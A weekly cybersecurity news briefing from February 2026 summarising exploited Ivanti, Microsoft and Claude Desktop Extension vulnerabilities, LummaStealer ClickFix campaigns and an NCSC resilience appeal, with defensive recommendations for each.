Weekly Cyber Briefing 13.02.2026
Vulnerability exploits rock government Ivanti users, Microsoft customers and Claude DXT users; the NCSC urges critical infrastructure providers to boost resilience; and LummaStealer infections surge.
Several European governments have had employee data compromised in what appears to be a coordinated campaign. The threat actors exploited at least one critical zero-day vulnerability in Ivanti Endpoint Manager Mobile (EPMM), a mobile device management product. The vendor issued patches for two critical zero-days on January 29. The European Commission, Finnish, and Dutch governments all issued statements confirming data breaches on February 6. Potentially compromised information included names, business email addresses, and telephone numbers.
Edge infrastructure, such as Ivanti EPMM, is an increasingly popular target for threat actors. In this case, exposed information could enable threat actors to launch convincing follow-on spear-phishing attacks for deeper system access.
Follow Ivanti’s instructions to patch the impacted products. Reset any related passwords and update user awareness training to warn of potential spear phishing. Place edge devices behind zero trust network access (ZTNA) gateways.
Researchers have discovered a critical vulnerability in 50 Claude Desktop Extensions (DXT) that could enable remote code execution (RCE) without user interaction. The bug has a CVSS score of 10.0 and could affect more than 10,000 active Claude DXT users, but Anthropic has declined to fix it at this time, citing that it “falls outside our current threat model.”
Anthropic’s Claude chatbot is popular with enterprise users, who may be using it without their IT department’s knowledge. Unlike sandboxed browser extensions, Claude DXTs run with full system privileges, exposing users to greater risk.
Treat MCP connectors like Claud DXTs as unsafe. Where possible, audit their use across the enterprise and request removal. Block enterprise downloads of the chatbot.
Researchers have observed an increase in LummaStealer (LummaC2) infections driven by social engineering “ClickFix” attacks. Bitdefender saw a significant surge in December and January, with LummaC2 delivered through the CastleLoader malware loader. Users are presented with fake CAPTCHA requests to trick them into executing malicious PowerShell commands.
LummaC2 is designed to steal a range of sensitive data, including credentials and cookies stored in web browsers, cryptocurrency wallet info, documents, session cookies, and 2FA backup codes and tokens. It could enable more serious data breaches and ransomware attacks.
Put controls in place to prevent users downloading and executing software or media from untrusted sources such as torrent sites. Update security awareness training to include ClickFix techniques. Block traffic to known infostealer C&C servers.
The National Cyber Security Centre (NCSC) has urged critical national infrastructure (CNI) providers to step up their efforts to improve cyber resilience. The call from the director for national resilience follows a recent sophisticated Russian campaign to sabotage Polish energy infrastructure.
State actors are becoming more emboldened to strike at CNI, especially in countries allied to Ukraine. A serious attack could cause major disruption to infrastructure, and economic, societal and reputational damage.
The NCSC urges CNI to consult its Cyber Assessment Framework (CAF) to “understand and implement an appropriate, and robust, level of cyber resilience.” It contains useful advice on risk management, identity and access controls, and threat hunting. Separate NCSC advice on mitigating “severe” threats is available here.
Microsoft issued patches for a whopping six actively exploited zero-day vulnerabilities in this month’s Patch Tuesday, three of which had been publicly disclosed. Three of the zero-days (CVE-2026-21510, CVE-2026-21513, CVE-2026-21514) allow attackers to bypass Windows security prompts. Two are elevation-of-privilege bugs (CVE-2026-21533 and CVE-2026-21519), and another (CVE-2026-21525) is a denial-of-service bug.
The zero-days are being actively exploited, making patching an immediate priority. There’s a greater risk of exploitation for those CVEs for which information has been publicly disclosed (CVE-2026-21513, CVE-2026-21510, and CVE-2026-21514).
No organisation’s exposure to CVEs is the same. Use a risk-based methodology to prioritise patching for those released in this month’s Patch Tuesday (including the zero-days).
Assured Reacts 12.02.2026
What does a proposed mega acquisition mean for Assured, its customers and the cyber-insurance sector?
Features 11.02.2026
Why AI frameworks are a new front in the battle against cyber risk
Weekly Cyber Briefing 06.02.2026
ShinyHunters use dynamic vishing tech to steal SSO credentials; MongoDB instances continue to be targeted in data extortion attacks; Coinbase reveals insider breach via former contractor; Multiple critical n8n bugs could allow complete remote takeover; AI-powered voice and virtual meeting fraud soars 1000%+ in a year; 0apt unmasked as a scam-as-a-service outfit